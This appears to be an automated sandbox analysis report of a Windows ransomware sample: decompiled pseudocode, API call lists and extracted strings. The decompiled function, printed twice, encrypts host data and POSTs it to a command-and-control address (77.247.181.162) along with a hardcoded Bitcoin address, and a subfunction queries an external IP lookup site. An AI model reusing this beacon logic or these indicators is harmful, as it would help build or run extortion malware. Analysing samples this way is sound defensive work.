				_t245 = 1;
				_t253 = _t252 + 0xc;
				_a4 = _t107;
				_t269 =  *0x462864 - _t245; // 0x0
				if(_t269 != 0) {
					_a344 = 0x676e6950;
				} else {
					E00425A6E( &_a344, 0xf, "Cr");
					E00425D48( &_a344, 0xf, "ypted");
					_t253 = _t253 + 0x18;
				}
				_t108 = 0x46284c;
				do {
					_t180 =  *_t108;
					_t108 = _t108 + 1;
				} while (_t180 != 0);
				if(_t108 == 0x46284d) {
					E0041BA30(0, 0x46284d); // executed
				}
				_a1160 = 0;
				E0042D0A0( &_a1161, 0, 0xfff);
				_t254 = _t253 + 0xc;
				_t112 = InternetOpenA("Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko", 0, 0, 0, 0); // executed
				_t238 = 0x48224c;
				_v20 = _t112;
				_v8 = 0x48224c;
				while(1) {
					E0042D0A0( &_v0, 0, 0x3c);
					_v0 = 0x3c;
					_a20 = _t245;
					_a48 = _t245;
					_a372 = 0;
					E0042D0A0( &_a373, 0, 0xff);
					_a628 = 0;
					E0042D0A0( &_a629, 0, 0x1ff);
					_t246 =  *_t238;
					_t117 = _t246;
					_t254 = _t254 + 0x24;
					_t24 =  &(_t117[1]); // 0x2
					_t211 = _t24;
					do {
						_t182 =  *_t117;
						_t117 =  &(_t117[1]);
					} while (_t182 != 0);
					if(InternetCrackUrlA(_t246, _t117 - _t211, 0,  &_v0) == 0) {
						L27:
						_t238 =  &(_t238[1]);
						_v24 = _t238;
						if(_t238 < 0x482264) {
							_t245 = 1;
							continue;
						}
						L28:
						InternetCloseHandle(_v36);
						_t287 =  *0x462864; // 0x0
						if(_t287 == 0) {
							E004258E3(_v36);
						}
						ExitThread(1);
					}
					_t123 = _a4;
					if(_a4 > 0) {
						E004262F3( &_a356, 0x100, _v0, _t123);
						_t254 = _t254 + 0x10;
					}
					_t124 = _a32;
					if(_a32 > 0) {
						E004262F3( &_a612, 0x200, _a28, _t124);
						_t254 = _t254 + 0x10;
					}
					E0042D0A0( &_a1124, 0, 0x1000);
					_push( *0x441d27 & 0x000000ff);
					_push( *0x441d26 & 0x000000ff);
					_push( *0x441d25 & 0x000000ff);
					_push( *0x441d24 & 0x000000ff);
					_push( *0x441d23 & 0x000000ff);
					_push( *0x441d22 & 0x000000ff);
					_push( *0x441d21 & 0x000000ff);
					_t188 =  *0x462860; // 0x5e
					_push( *0x441d20 & 0x000000ff);
					_t215 =  *0x441744; // 0x1db1
					_push("77.247.181.162");
					_push( &_a356);
					_t130 =  *0x441ffc; // 0x0
					_push(_t188);
					_t189 =  *0x441ff8; // 0xd906b70
					_push(_t215);
					_push("3.0.0");
					_push(0);
					_push(0x400);
					_push(_t130);
					_push(_t189);
					L004305F4();
					_push(0);
					_push(0x400);
					_push(_t215);
					_push(_t130);
					L004305F4();
					_t190 =  *0x441734; // 0x2064708
					_push(_t215);
					_push(_t130);
					_push("149GjgCKkimJLKjmzZumc1Hg6bpdDihTSg");
					_push(_v64);
					_push("empty");
					E0041BB10(0x1000,  &_a1092, _t190,  &_a276); // executed
					_a8284 = 0;
					E0042D0A0( &_a8285, 0, 0xfff);
					_t247 =  *0x441b60; // 0x2064f50
					_t260 = _t254 + 0x6c;
					_a293 = 0;
					_a297 = 0;
					_a301 = 0;
					_a305 = 0;
					_a309 = 0;
					_a313 = 0;
					_a317 = 0;
					_a321 = 0;
					_a323 = 0;
					_t136 = _t247;
					_a292 = 0;
					_t49 = _t136 + 1; // 0x2064f51
					_t239 = _t49;
					do {
						_t191 =  *_t136;
						_t136 = _t136 + 1;
					} while (_t191 != 0);
					E00420980(0, _t247,  &_a292, _t136 - _t239);
					_push( &_a12);
					_push( &_a292);
					_a260 = 0xaaaaffff;
					_a264 = 0xefbe0000;
					_a268 = 0xadde;
					_a272 = 0xffffffbe;
					E00424040();
					_t140 =  &_a1092;
					_t262 = _t260 + 0xc;
					_t248 = _t140 + 1;
					do {
						_t194 =  *_t140;
						_t140 = _t140 + 1;
					} while (_t194 != 0);
					_t195 = _t140 - _t248;
					E0042D0A0(_t262 + _t140 - _t248 + 0x4a1, 0x10, 0x10);
					_push( &_a12);
					_push( &_a260);
					_push( &_a1092);
					E0041BC70(_t140 - _t248 + 0x10 - (_t195 + 0x00000001 & 0x0000000f) + 1,  &_a8284);
					E0040D8C0(E0040D580(),  &_a8284,  &_a8284, _t140 - _t248 + 0x10 - (_t195 + 0x00000001 & 0x0000000f) + 1);
					_t241 = E00411370(_t148);
					E0041BB10(0x1000,  &_a1092, "data=%s", _t150);
					E0040D4F0(_t148);
					_t154 = InternetConnectA(_v68,  &_a324, 0x50, 0, 0, 3, 0, 0); // executed
					_t250 = _t154;
					_v136 = HttpOpenRequestA(_t250, "POST",  &_a548, 0, 0, "*/*", 0x80000000, 0);
					_a5124 = 0;
					E0042D0A0( &_a5125, 0, 0xc17);
					_t158 =  &_a1028;
					_t267 = _t262 + 0x3c;
					_v116 = 0;
					_t200 = _t158 + 1;
					do {
						_t228 =  *_t158;
						_t158 = _t158 + 1;
					} while (_t228 != 0);
					_t159 = _t158 - _t200;
					_t201 = "Content-Type: application/x-www-form-urlencoded";
					_v124 = _t201 + 1;
					do {
						_t230 =  *_t201;
						_t201 = _t201 + 1;
					} while (_t230 != 0);
					HttpSendRequestA(_v136, "Content-Type: application/x-www-form-urlencoded", _t201 - _v124,  &_a1028, _t159); // executed
					E004258E3(_t241);
					_t254 = _t267 + 4;
					if(GetLastError() != 0) {
						L26:
						InternetCloseHandle(_v156);
						InternetCloseHandle(_t250);
						_t238 = _v148;
						goto L27;
					}
					E0041BB40( &_a5104, 0xc16, _v156,  &_v136);
					_t168 = _v136;
					 *((char*)(_t254 + _t168 + 0x14a4)) = 0;
					 *((char*)(_t254 + _t168 + 0x14a9)) = 0;
					_t169 = strstr( &_a5104, "INSERTED");
					_t254 = _t254 + 0x10;
					if(_t169 != 0) {
						goto L28;
					}
					goto L26;
				}
			}

0x0041b485
0x0041b48d
0x0041b492
0x0041b499
0x0041b4a0
0x0041b4a5
0x0041b4ab
0x0041b4b1
0x0041b4b6
0x0041b4bc
0x0041b4c2
0x0041b4c8
0x0041b4cd
0x0041b4d4
0x0041b4da
0x0041b4df
0x0041b4e5
0x0041b4ea
0x0041b4fe
0x0041b506
0x0041b50d
0x0041b514
0x0041b51b
0x0041b522
0x0041b52a
0x0041b52f
0x0041b534
0x0041b537
0x0041b53b
0x0041b541
0x0041b573
0x0041b543
0x0041b552
0x0041b569
0x0041b56e
0x0041b56e
0x0041b57e
0x0041b586
0x0041b586
0x0041b588
0x0041b589
0x0041b58f
0x0041b591
0x0041b591
0x0041b5a4
0x0041b5ab
0x0041b5b0
0x0041b5bc
0x0041b5c2
0x0041b5c7
0x0041b5cb
0x0041b5d6
0x0041b5de
0x0041b5f4
0x0041b5fc
0x0041b600
0x0041b604
0x0041b60b
0x0041b621
0x0041b628
0x0041b62d
0x0041b62f
0x0041b631
0x0041b634
0x0041b634
0x0041b637
0x0041b637
0x0041b639
0x0041b63a
0x0041b650
0x0041b9f3
0x0041b9f3
0x0041b9f6
0x0041ba00
0x0041b5d1
0x00000000
0x0041b5d1
0x0041ba06
0x0041ba0b
0x0041ba11
0x0041ba17
0x0041ba1e
0x0041ba23
0x0041ba28
0x0041ba28
0x0041b656
0x0041b65c
0x0041b671
0x0041b676
0x0041b676
0x0041b679
0x0041b67f
0x0041b694
0x0041b699
0x0041b699
0x0041b6aa
0x0041b6c7
0x0041b6cf
0x0041b6d7
0x0041b6df
0x0041b6e7
0x0041b6ef
0x0041b6f0
0x0041b6f1
0x0041b6f7
0x0041b6f8
0x0041b6fe
0x0041b70a
0x0041b70b
0x0041b710
0x0041b711
0x0041b717
0x0041b718
0x0041b71d
0x0041b71e
0x0041b723
0x0041b724
0x0041b725
0x0041b72a
0x0041b72b
0x0041b730
0x0041b731
0x0041b732
0x0041b737
0x0041b73d
0x0041b742
0x0041b743
0x0041b748
0x0041b749
0x0041b764
0x0041b77a
0x0041b781
0x0041b786
0x0041b78c
0x0041b791
0x0041b798
0x0041b79f
0x0041b7a6
0x0041b7ad
0x0041b7b4
0x0041b7bb
0x0041b7c2
0x0041b7ca
0x0041b7d1
0x0041b7d3
0x0041b7da
0x0041b7da
0x0041b7e0
0x0041b7e0
0x0041b7e2
0x0041b7e3
0x0041b7f3
0x0041b7ff
0x0041b807
0x0041b808
0x0041b813
0x0041b81e
0x0041b829
0x0041b834
0x0041b839
0x0041b840
0x0041b843
0x0041b846
0x0041b846
0x0041b848
0x0041b849
0x0041b84f
0x0041b86c
0x0041b878
0x0041b880
0x0041b888
0x0041b892
0x0041b8aa
0x0041b8b8
0x0041b8cd
0x0041b8d5
0x0041b8ef
0x0041b90a
0x0041b91d
0x0041b92a
0x0041b931
0x0041b936
0x0041b93d
0x0041b940
0x0041b944
0x0041b947
0x0041b947
0x0041b949
0x0041b94a
0x0041b94e
0x0041b950
0x0041b958
0x0041b960
0x0041b960
0x0041b962
0x0041b963
0x0041b97f
0x0041b986
0x0041b98b
0x0041b996
0x0041b9df
0x0041b9ea
0x0041b9ed
0x0041b9ef
0x00000000
0x0041b9ef
0x0041b9ae
0x0041b9b3
0x0041b9c3
0x0041b9cb
0x0041b9d2
0x0041b9d8
0x0041b9dd
0x00000000
0x00000000
0x00000000
0x0041b9dd

APIs

Part of subcall function 00411370: _aullshr.NTDLL ref: 004113D6

InternetCloseHandle.WININET(?), ref: 0041BA0B

Part of subcall function 0041BA30: InternetOpenA.WININET(Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko,00000004,00000000,00000000,00000000), ref: 0041BA71
Part of subcall function 0041BA30: InternetOpenUrlW.WININET(00000000,http://ip.tyk.nu/,00000000,00000000,40000000,00000000), ref: 0041BA8A
Part of subcall function 0041BA30: InternetCloseHandle.WININET(00000000), ref: 0041BA97
Part of subcall function 0041BA30: InternetCloseHandle.WININET(00000000), ref: 0041BAFA
Part of subcall function 0041BA30: InternetCloseHandle.WININET(00000000), ref: 0041BAFD

InternetOpenA.WININET(Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko,00000000,00000000,00000000,00000000), ref: 0041B5BC
InternetCrackUrlA.WININET(00000001,00000002,00000000,?), ref: 0041B648
_alldiv.NTDLL(0D906B70,00000000,00000400,00000000), ref: 0041B725
_alldiv.NTDLL(00000000,?,00000400,00000000), ref: 0041B732
InternetConnectA.WININET(?,?,00000050,00000000,00000000,00000003,00000000,00000000), ref: 0041B8EF
HttpOpenRequestA.WININET(00000000,POST,?,00000000,00000000,*/*,80000000,00000000), ref: 0041B912
HttpSendRequestA.WININET(?,Content-Type: application/x-www-form-urlencoded,?,?,?), ref: 0041B97F

Part of subcall function 004258E3: HeapFree.KERNEL32(00000000,00000000), ref: 004258F9
Part of subcall function 004258E3: GetLastError.KERNEL32(00000000,?,0042A9F6,00000000,?,004258DE,?,00000000,?,?,00000000,00000000,?,0041BB2C,?,00001000), ref: 0042590B

GetLastError.KERNEL32 ref: 0041B98E
ExitThread.KERNEL32 ref: 0041BA28

Part of subcall function 0041BB40: InternetReadFile.WININET(?,?,?,?,00000000,00000000), ref: 0041BC50

strstr.NTDLL ref: 0041B9D2
InternetCloseHandle.WININET(?), ref: 0041B9EA
InternetCloseHandle.WININET(00000000), ref: 0041B9ED

Strings

Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko, xrefs: 0041B5B7
INSERTED, xrefs: 0041B9BE
149GjgCKkimJLKjmzZumc1Hg6bpdDihTSg, xrefs: 0041B743
<, xrefs: 0041B5F4
empty, xrefs: 0041B749
77.247.181.162, xrefs: 0041B57E, 0041B6FE
ypted, xrefs: 0041B55A
Ping, xrefs: 0041B573
Content-Type: application/x-www-form-urlencoded, xrefs: 0041B950, 0041B979
3.0.0, xrefs: 0041B718
POST, xrefs: 0041B90C
*/*, xrefs: 0041B8FB
data=%s, xrefs: 0041B8C2

Memory Dump Source

Source File: 00000001.00000002.1397105690.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_amhfnhe45.jbxd

Function 0041B480, Relevance: 44.1, APIs: 13, Strings: 12, Instructions: 392

C-Code - Quality: 80%

			E0041B480(intOrPtr _a4, char _a12, long _a20, intOrPtr _a28, intOrPtr _a32, long _a48, char _a260, intOrPtr _a264, intOrPtr _a268, intOrPtr _a272, char _a276, char _a292, intOrPtr _a293, intOrPtr _a297, intOrPtr _a301, intOrPtr _a305, intOrPtr _a309, intOrPtr _a313, intOrPtr _a317, short _a321, char _a323, char _a324, char _a344, char* _a345, char* _a349, char* _a353, char _a356, short _a357, char _a372, char _a373, char _a548, char _a612, char _a628, char _a629, void _a1028, char _a1092, char _a1124, char _a1160, char _a1161, char _a5104, char _a5124, char _a5125, char _a8284, char _a8285, signed int _a12452) {
				void* _v0;
				char** _v8;
				void* _v20;
				char** _v24;
				void* _v36;
				intOrPtr _v64;
				void* _v68;
				char* _v116;
				intOrPtr _v124;
				void* _v136;
				char** _v148;
				void* _v156;
				signed int _t100;
				char* _t102;
				intOrPtr _t103;
				intOrPtr _t104;
				intOrPtr _t107;
				intOrPtr* _t108;
				void* _t112;
				char* _t117;
				intOrPtr _t130;
				intOrPtr* _t136;
				intOrPtr* _t140;
				void* _t154;
				intOrPtr* _t158;
				long _t159;
				void* _t168;
				char* _t169;
				intOrPtr _t178;
				intOrPtr _t179;
				intOrPtr _t180;
				char _t182;
				intOrPtr _t188;
				intOrPtr _t189;
				intOrPtr _t190;
				intOrPtr _t191;
				intOrPtr _t194;
				void* _t200;
				intOrPtr* _t201;
				intOrPtr _t208;
				void* _t209;
				char* _t211;
				intOrPtr _t215;
				intOrPtr _t228;
				intOrPtr _t230;
				char** _t238;
				void* _t239;
				long _t245;
				char* _t246;
				intOrPtr* _t247;
				void* _t248;
				void* _t250;
				signed int _t251;
				signed int _t252;
				void* _t253;
				void* _t254;
				void* _t260;
				void* _t262;
				void* _t267;
				void* _t269;
				intOrPtr _t287;

				_t252 = _t251 & 0xfffffff8;
				E0042E220(0x30ac);
				_t100 =  *0x43f054; // 0xd6baf341
				_a12452 = _t100 ^ _t252;
				_t102 =  *0x44185c; // 0x0
				_t178 =  *0x441b58; // 0x0
				_t208 =  *0x441858; // 0x0
				 *0x48224c = _t102;
				_t103 =  *0x441b5c; // 0x0
				 *0x482250 = _t178;
				_t179 =  *0x441854; // 0x0
				 *0x482258 = _t103;
				_t104 =  *0x441b64; // 0x0
				 *0x482254 = _t208;
				 *0x48225c = _t104;
				 *0x482260 = _t179;
				 *0x482264 = _t104;
				 *0x482268 = _t179;
				E0040D8C0(E0040D580(), _t208, 0x441d88, 0x61);
				_a344 = 0;
				_a345 = 0;
				_a349 = 0;
				_a353 = 0;
				_a357 = 0;
				_t107 = E00411370(_t105);
				_t245 = 1;
				_t253 = _t252 + 0xc;
				_a4 = _t107;
				_t269 =  *0x462864 - _t245; // 0x0
				if(_t269 != 0) {
					_a344 = 0x676e6950;
				} else {
					E00425A6E( &_a344, 0xf, "Cr");
					E00425D48( &_a344, 0xf, "ypted");
					_t253 = _t253 + 0x18;
				}
				_t108 = 0x46284c;
				_t11 = _t108 + 1; // 0x46284d
				_t209 = _t11;
				do {
					_t180 =  *_t108;
					_t108 = _t108 + 1;
				} while (_t180 != 0);
				if(_t108 == _t209) {
					E0041BA30(0, _t209); // executed
				}
				_a1160 = 0;
				E0042D0A0( &_a1161, 0, 0xfff);
				_t254 = _t253 + 0xc;
				_t112 = InternetOpenA("Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko", 0, 0, 0, 0); // executed
				_t238 = 0x48224c;
				_v20 = _t112;
				_v8 = 0x48224c;
				while(1) {
					E0042D0A0( &_v0, 0, 0x3c);
					_v0 = 0x3c;
					_a20 = _t245;
					_a48 = _t245;
					_a372 = 0;
					E0042D0A0( &_a373, 0, 0xff);
					_a628 = 0;
					E0042D0A0( &_a629, 0, 0x1ff);
					_t246 =  *_t238;
					_t117 = _t246;
					_t254 = _t254 + 0x24;
					_t24 =  &(_t117[1]); // 0x2
					_t211 = _t24;
					do {
						_t182 =  *_t117;
						_t117 =  &(_t117[1]);
					} while (_t182 != 0);
					if(InternetCrackUrlA(_t246, _t117 - _t211, 0,  &_v0) == 0) {
						L27:
						_t238 =  &(_t238[1]);
						_v24 = _t238;
						if(_t238 < 0x482264) {
							_t245 = 1;
							continue;
						}
						L28:
						InternetCloseHandle(_v36);
						_t287 =  *0x462864; // 0x0
						if(_t287 == 0) {
							E004258E3(_v36);
						}
						ExitThread(1);
					}
					_t123 = _a4;
					if(_a4 > 0) {
						E004262F3( &_a356, 0x100, _v0, _t123);
						_t254 = _t254 + 0x10;
					}
					_t124 = _a32;
					if(_a32 > 0) {
						E004262F3( &_a612, 0x200, _a28, _t124);
						_t254 = _t254 + 0x10;
					}
					E0042D0A0( &_a1124, 0, 0x1000);
					_push( *0x441d27 & 0x000000ff);
					_push( *0x441d26 & 0x000000ff);
					_push( *0x441d25 & 0x000000ff);
					_push( *0x441d24 & 0x000000ff);
					_push( *0x441d23 & 0x000000ff);
					_push( *0x441d22 & 0x000000ff);
					_push( *0x441d21 & 0x000000ff);
					_t188 =  *0x462860; // 0x5e
					_push( *0x441d20 & 0x000000ff);
					_t215 =  *0x441744; // 0x1db1
					_push(0x46284c);
					_push( &_a356);
					_t130 =  *0x441ffc; // 0x0
					_push(_t188);
					_t189 =  *0x441ff8; // 0x0
					_push(_t215);
					_push("3.0.0");
					_push(0);
					_push(0x400);
					_push(_t130);
					_push(_t189);
					L004305F4();
					_push(0);
					_push(0x400);
					_push(_t215);
					_push(_t130);
					L004305F4();
					_t190 =  *0x441734; // 0x0
					_push(_t215);
					_push(_t130);
					_push("149GjgCKkimJLKjmzZumc1Hg6bpdDihTSg");
					_push(_v64);
					_push("empty");
					E0041BB10(0x1000,  &_a1092, _t190,  &_a276); // executed
					_a8284 = 0;
					E0042D0A0( &_a8285, 0, 0xfff);
					_t247 =  *0x441b60; // 0x0
					_t260 = _t254 + 0x6c;
					_a293 = 0;
					_a297 = 0;
					_a301 = 0;
					_a305 = 0;
					_a309 = 0;
					_a313 = 0;
					_a317 = 0;
					_a321 = 0;
					_a323 = 0;
					_t136 = _t247;
					_a292 = 0;
					_t49 = _t136 + 1; // 0x1
					_t239 = _t49;
					do {
						_t191 =  *_t136;
						_t136 = _t136 + 1;
					} while (_t191 != 0);
					E00420980(0, _t247,  &_a292, _t136 - _t239);
					_push( &_a12);
					_push( &_a292);
					_a260 = 0xaaaaffff;
					_a264 = 0xefbe0000;
					_a268 = 0xadde;
					_a272 = 0xffffffbe;
					E00424040();
					_t140 =  &_a1092;
					_t262 = _t260 + 0xc;
					_t248 = _t140 + 1;
					do {
						_t194 =  *_t140;
						_t140 = _t140 + 1;
					} while (_t194 != 0);
					_t195 = _t140 - _t248;
					E0042D0A0(_t262 + _t140 - _t248 + 0x4a1, 0x10, 0x10);
					_push( &_a12);
					_push( &_a260);
					_push( &_a1092);
					E0041BC70(_t140 - _t248 + 0x10 - (_t195 + 0x00000001 & 0x0000000f) + 1,  &_a8284);
					E0040D8C0(E0040D580(),  &_a8284,  &_a8284, _t140 - _t248 + 0x10 - (_t195 + 0x00000001 & 0x0000000f) + 1);
					_t241 = E00411370(_t148);
					E0041BB10(0x1000,  &_a1092, "data=%s", _t150);
					E0040D4F0(_t148);
					_t154 = InternetConnectA(_v68,  &_a324, 0x50, 0, 0, 3, 0, 0); // executed
					_t250 = _t154;
					_v136 = HttpOpenRequestA(_t250, "POST",  &_a548, 0, 0, "*/*", 0x80000000, 0);
					_a5124 = 0;
					E0042D0A0( &_a5125, 0, 0xc17);
					_t158 =  &_a1028;
					_t267 = _t262 + 0x3c;
					_v116 = 0;
					_t200 = _t158 + 1;
					do {
						_t228 =  *_t158;
						_t158 = _t158 + 1;
					} while (_t228 != 0);
					_t159 = _t158 - _t200;
					_t201 = "Content-Type: application/x-www-form-urlencoded";
					_v124 = _t201 + 1;
					do {
						_t230 =  *_t201;
						_t201 = _t201 + 1;
					} while (_t230 != 0);
					HttpSendRequestA(_v136, "Content-Type: application/x-www-form-urlencoded", _t201 - _v124,  &_a1028, _t159); // executed
					E004258E3(_t241);
					_t254 = _t267 + 4;
					if(GetLastError() != 0) {
						L26:
						InternetCloseHandle(_v156);
						InternetCloseHandle(_t250);
						_t238 = _v148;
						goto L27;
					}
					E0041BB40( &_a5104, 0xc16, _v156,  &_v136);
					_t168 = _v136;
					 *((char*)(_t254 + _t168 + 0x14a4)) = 0;
					 *((char*)(_t254 + _t168 + 0x14a9)) = 0;
					_t169 = strstr( &_a5104, "INSERTED");
					_t254 = _t254 + 0x10;
					if(_t169 != 0) {
						goto L28;
					}
					goto L26;
				}
			}

0x0041b485
0x0041b48d
0x0041b492
0x0041b499
0x0041b4a0
0x0041b4a5
0x0041b4ab
0x0041b4b1
0x0041b4b6
0x0041b4bc
0x0041b4c2
0x0041b4c8
0x0041b4cd
0x0041b4d4
0x0041b4da
0x0041b4df
0x0041b4e5
0x0041b4ea
0x0041b4fe
0x0041b506
0x0041b50d
0x0041b514
0x0041b51b
0x0041b522
0x0041b52a
0x0041b52f
0x0041b534
0x0041b537
0x0041b53b
0x0041b541
0x0041b573
0x0041b543
0x0041b552
0x0041b569
0x0041b56e
0x0041b56e
0x0041b57e
0x0041b583
0x0041b583
0x0041b586
0x0041b586
0x0041b588
0x0041b589
0x0041b58f
0x0041b591
0x0041b591
0x0041b5a4
0x0041b5ab
0x0041b5b0
0x0041b5bc
0x0041b5c2
0x0041b5c7
0x0041b5cb
0x0041b5d6
0x0041b5de
0x0041b5f4
0x0041b5fc
0x0041b600
0x0041b604
0x0041b60b
0x0041b621
0x0041b628
0x0041b62d
0x0041b62f
0x0041b631
0x0041b634
0x0041b634
0x0041b637
0x0041b637
0x0041b639
0x0041b63a
0x0041b650
0x0041b9f3
0x0041b9f3
0x0041b9f6
0x0041ba00
0x0041b5d1
0x00000000
0x0041b5d1
0x0041ba06
0x0041ba0b
0x0041ba11
0x0041ba17
0x0041ba1e
0x0041ba23
0x0041ba28
0x0041ba28
0x0041b656
0x0041b65c
0x0041b671
0x0041b676
0x0041b676
0x0041b679
0x0041b67f
0x0041b694
0x0041b699
0x0041b699
0x0041b6aa
0x0041b6c7
0x0041b6cf
0x0041b6d7
0x0041b6df
0x0041b6e7
0x0041b6ef
0x0041b6f0
0x0041b6f1
0x0041b6f7
0x0041b6f8
0x0041b6fe
0x0041b70a
0x0041b70b
0x0041b710
0x0041b711
0x0041b717
0x0041b718
0x0041b71d
0x0041b71e
0x0041b723
0x0041b724
0x0041b725
0x0041b72a
0x0041b72b
0x0041b730
0x0041b731
0x0041b732
0x0041b737
0x0041b73d
0x0041b742
0x0041b743
0x0041b748
0x0041b749
0x0041b764
0x0041b77a
0x0041b781
0x0041b786
0x0041b78c
0x0041b791
0x0041b798
0x0041b79f
0x0041b7a6
0x0041b7ad
0x0041b7b4
0x0041b7bb
0x0041b7c2
0x0041b7ca
0x0041b7d1
0x0041b7d3
0x0041b7da
0x0041b7da
0x0041b7e0
0x0041b7e0
0x0041b7e2
0x0041b7e3
0x0041b7f3
0x0041b7ff
0x0041b807
0x0041b808
0x0041b813
0x0041b81e
0x0041b829
0x0041b834
0x0041b839
0x0041b840
0x0041b843
0x0041b846
0x0041b846
0x0041b848
0x0041b849
0x0041b84f
0x0041b86c
0x0041b878
0x0041b880
0x0041b888
0x0041b892
0x0041b8aa
0x0041b8b8
0x0041b8cd
0x0041b8d5
0x0041b8ef
0x0041b90a
0x0041b91d
0x0041b92a
0x0041b931
0x0041b936
0x0041b93d
0x0041b940
0x0041b944
0x0041b947
0x0041b947
0x0041b949
0x0041b94a
0x0041b94e
0x0041b950
0x0041b958
0x0041b960
0x0041b960
0x0041b962
0x0041b963
0x0041b97f
0x0041b986
0x0041b98b
0x0041b996
0x0041b9df
0x0041b9ea
0x0041b9ed
0x0041b9ef
0x00000000
0x0041b9ef
0x0041b9ae
0x0041b9b3
0x0041b9c3
0x0041b9cb
0x0041b9d2
0x0041b9d8
0x0041b9dd
0x00000000
0x00000000
0x00000000
0x0041b9dd

APIs

Part of subcall function 00411370: _aullshr.NTDLL ref: 004113D6

InternetCloseHandle.WININET(?), ref: 0041BA0B

Part of subcall function 0041BA30: InternetOpenA.WININET(Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko,00000004,00000000,00000000,00000000), ref: 0041BA71
Part of subcall function 0041BA30: InternetOpenUrlW.WININET(00000000,http://ip.tyk.nu/,00000000,00000000,40000000,00000000), ref: 0041BA8A
Part of subcall function 0041BA30: InternetCloseHandle.WININET(00000000), ref: 0041BA97
Part of subcall function 0041BA30: InternetCloseHandle.WININET(00000000), ref: 0041BAFA
Part of subcall function 0041BA30: InternetCloseHandle.WININET(00000000), ref: 0041BAFD

InternetOpenA.WININET(Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko,00000000,00000000,00000000,00000000), ref: 0041B5BC
InternetCrackUrlA.WININET(00000001,00000002,00000000,?), ref: 0041B648
_alldiv.NTDLL(00000000,00000000,00000400,00000000), ref: 0041B725
_alldiv.NTDLL(00000000,?,00000400,00000000), ref: 0041B732
InternetConnectA.WININET(?,?,00000050,00000000,00000000,00000003,00000000,00000000), ref: 0041B8EF
HttpOpenRequestA.WININET(00000000,POST,?,00000000,00000000,*/*,80000000,00000000), ref: 0041B912
HttpSendRequestA.WININET(?,Content-Type: application/x-www-form-urlencoded,?,?,?), ref: 0041B97F

Part of subcall function 004258E3: HeapFree.KERNEL32(00000000,00000000), ref: 004258F9
Part of subcall function 004258E3: GetLastError.KERNEL32(00000000,?,0042A9F6,00000000,?,004258DE,?,00000000,?,?,00000000,00000000,?,0041BB2C,?,00001000), ref: 0042590B

GetLastError.KERNEL32 ref: 0041B98E
ExitThread.KERNEL32 ref: 0041BA28

Part of subcall function 0041BB40: InternetReadFile.WININET(?,?,?,?,00000000,00000000), ref: 0041BC50

strstr.NTDLL ref: 0041B9D2
InternetCloseHandle.WININET(?), ref: 0041B9EA
InternetCloseHandle.WININET(00000000), ref: 0041B9ED

Strings

Ping, xrefs: 0041B573
ypted, xrefs: 0041B55A
Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko, xrefs: 0041B5B7
empty, xrefs: 0041B749
*/*, xrefs: 0041B8FB
POST, xrefs: 0041B90C
INSERTED, xrefs: 0041B9BE
149GjgCKkimJLKjmzZumc1Hg6bpdDihTSg, xrefs: 0041B743
<, xrefs: 0041B5F4
Content-Type: application/x-www-form-urlencoded, xrefs: 0041B950, 0041B979
data=%s, xrefs: 0041B8C2
3.0.0, xrefs: 0041B718

Memory Dump Source

Source File: 00000001.00000001.229874161.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_1_400000_amhfnhe45.jbxd

Function 0042AB4E, Relevance: 33.4, APIs: 14, Strings: 5, Instructions: 109

C-Code - Quality: 51%

			E0042AB4E(void* __ebx, void* __edx) {
				void* __edi;
				void* __esi;
				_Unknown_base(*)()* _t7;
				long _t10;
				void* _t11;
				int _t12;
				void* _t14;
				void* _t15;
				void* _t16;
				_Unknown_base(*)()* _t17;
				void* _t18;
				intOrPtr* _t20;
				intOrPtr _t21;
				intOrPtr* _t23;
				long _t26;
				void* _t30;
				void* _t35;
				struct HINSTANCE__* _t36;
				intOrPtr* _t37;
				void* _t40;
				intOrPtr* _t42;
				void* _t43;

				_t35 = __edx;
				_t30 = __ebx;
				_t36 = GetModuleHandleW(L"KERNEL32.DLL");
				if(_t36 != 0) {
					 *0x440e88 = GetProcAddress(_t36, "FlsAlloc");
					 *0x440e8c = GetProcAddress(_t36, "FlsGetValue");
					 *0x440e90 = GetProcAddress(_t36, "FlsSetValue");
					_t7 = GetProcAddress(_t36, "FlsFree");
					__eflags =  *0x440e88;
					_t40 = TlsSetValue;
					 *0x440e94 = _t7;
					if( *0x440e88 == 0) {
						L6:
						 *0x440e8c = TlsGetValue;
						 *0x440e88 = E0042A85E;
						 *0x440e90 = _t40;
						 *0x440e94 = TlsFree;
					} else {
						__eflags =  *0x440e8c;
						if( *0x440e8c == 0) {
							goto L6;
						} else {
							__eflags =  *0x440e90;
							if( *0x440e90 == 0) {
								goto L6;
							} else {
								__eflags = _t7;
								if(_t7 == 0) {
									goto L6;
								}
							}
						}
					}
					_t10 = TlsAlloc();
					 *0x43fbd0 = _t10;
					__eflags = _t10 - 0xffffffff;
					if(_t10 == 0xffffffff) {
						L15:
						_t11 = 0;
						__eflags = 0;
					} else {
						_t12 = TlsSetValue(_t10,  *0x440e8c);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L15;
						} else {
							E004266FA();
							_t42 = __imp__EncodePointer; // executed
							_t14 =  *_t42( *0x440e88); // executed
							 *0x440e88 = _t14; // executed
							_t15 =  *_t42( *0x440e8c); // executed
							 *0x440e8c = _t15; // executed
							_t16 =  *_t42( *0x440e90); // executed
							 *0x440e90 = _t16; // executed
							_t17 =  *_t42( *0x440e94); // executed
							 *0x440e94 = _t17;
							_t18 = E0042B881();
							__eflags = _t18;
							if(_t18 == 0) {
								L14:
								E0042A89B();
								goto L15;
							} else {
								_t37 = __imp__DecodePointer;
								_t20 =  *_t37( *0x440e88, E0042AA1F); // executed
								_t21 =  *_t20();
								 *0x43fbcc = _t21;
